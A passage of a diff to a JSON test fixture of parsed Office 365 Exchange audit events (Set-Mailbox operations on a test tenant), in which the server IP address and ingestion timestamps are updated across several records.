bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -6149,12 +6149,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -6197,7 +6197,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -6209,8 +6209,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177797500Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"7b5e608f-0a09-4251-8922-08d7adfc0d15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853384900Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"7b5e608f-0a09-4251-8922-08d7adfc0d15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -6230,12 +6230,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -6278,7 +6278,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -6290,8 +6290,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177800200Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:03\",\"ExternalAccess\":true,\"Id\":\"96b98335-ab19-4e22-31e0-08d7ac0f2ac2\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853390700Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:03\",\"ExternalAccess\":true,\"Id\":\"96b98335-ab19-4e22-31e0-08d7ac0f2ac2\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -6311,12 +6311,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -6359,7 +6359,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -6371,8 +6371,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177803200Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853396500Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -6392,12 +6392,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -6440,7 +6440,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -6452,8 +6452,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177806100Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:04\",\"ExternalAccess\":true,\"Id\":\"5cd5fc38-5b48-47d6-2e47-08d7ac0f2b01\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853402300Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:04\",\"ExternalAccess\":true,\"Id\":\"5cd5fc38-5b48-47d6-2e47-08d7ac0f2b01\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -6473,12 +6473,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -6521,7 +6521,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -6533,8 +6533,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177808800Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"ff48ffeb-5c2a-468f-9113-08d7ac0f3512\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853408Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"ff48ffeb-5c2a-468f-9113-08d7ac0f3512\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -6554,12 +6554,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -6602,7 +6602,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -6614,8 +6614,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177811800Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"d16f181c-257c-4d40-45e1-08d7adfc0c02\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 